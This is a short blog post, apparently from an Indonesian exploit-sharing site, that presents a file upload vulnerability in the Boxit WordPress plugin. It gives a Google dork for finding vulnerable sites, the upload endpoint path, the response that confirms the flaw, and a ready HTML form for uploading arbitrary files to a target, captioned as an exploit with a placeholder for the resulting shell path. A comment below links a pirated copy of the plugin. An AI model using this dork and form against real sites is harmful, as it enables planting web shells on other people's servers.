Wordpress Boxit Plugins File Upload Vulnerability


#- Title: Wordpress Boxit Plugins File Upload Vulnerability
#- Author: unknown
#- Date: 26/12/15
#- Developer : boxit.sd-dev .com
#- Link Download : codecanyon .net/item/boxit-the-dropbox-file-upload-for-wordpress/4425955
#- Google Dork: inurl:"/plugins/boxit/"
#- Fixed in Version : -
#- Tested on : Windows 
==================================================
-- Proof Of Concept --

When Vuln:
{"jsonrpc" : "2.0", "result" : "ok"} 

CSRF :

<formaction="http://target/wp-content/plugins/boxit/upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

Shell PathHere
Saya tidak meminta satu rupiah pun dari anda, Tolong hargai Copyright konten yang ditulis oleh Admin, Jika ingin Copy-Paste tolong sertakan link sumber. Terimakasih :)
Open My Youtube Channel
Previous
Next Post »

1 komentar:

Click here for komentar
Marion
admin
18 January 2016 at 05:19 ×

BOXIT – The Dropbox file upload for WordPress is available to download: pluginsweb.com/2016/01/05/download-boxit-the-dropbox-file-upload-for-wordpress/

Congrats bro Marion you got PERTAMAX...! hehehehe...
Reply
avatar
Thanks for your comment